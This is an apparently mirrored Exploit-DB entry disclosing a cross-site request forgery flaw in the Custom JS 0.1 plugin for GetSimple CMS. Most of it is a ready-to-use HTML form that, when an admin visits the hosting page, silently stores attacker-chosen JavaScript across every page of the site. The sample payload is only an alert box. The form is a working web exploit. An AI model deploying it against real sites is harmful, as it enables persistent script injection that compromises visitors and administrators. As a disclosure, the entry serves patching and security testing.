‘customhs_js_content’ – ‘customhs_js_content’ Cross-Site Request Forgery

  • 作者: Abhishek Joshi
    日期: 2021-03-26
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/49712/
  • # Exploit Title: GetSimple CMS Custom JS Plugin 0.1 - 'customhs_js_content' Cross-Site Request Forgery
    # Exploit Author: Abhishek Joshi 
    # Date: March 25, 2021
    # Vendor Homepage: http://get-simple.info/extend/plugin/custom-js/1267 / http://get-simple.info/download
    # Software Link: http://get-simple.info/extend/export/5260/1267/custom-js.zip
    # Version: 0.1 
    # Tested On: Windows 10 Pro + XAMPP + PHP Version 7.4.10
    # Tested against: Firefox 78.7.0esr (64-bit)
    
    # Vulnerability Description:
    # Cross-Site Request Forgery (CSRF) vulnerability in Custom JS v0.1 plugin for GetSimple CMS allows remote attackers to inject arbitrary client-side script code into every webpage hosted on the CMS (Persistent Cross-Site Scripting), when an authenticated admin visiting a third-party site.
    
    ## CSRF POST Form Method
    <html><body>
    <form action="http://mygetsimplecms.local/admin/load.php?id=CustomJSPlugin" method="POST">
    <input type="hidden" name="customjs_url_content" value="">
    <input type="hidden" name="customjs_js_content" value="alert('Hello Abhishek Joshi from CSRF --> XSS all the things!')">
    <input type="hidden" name="submit" value="Save Settings">
    <input type="submit" value="Submit request">
    </form>
    </body></html>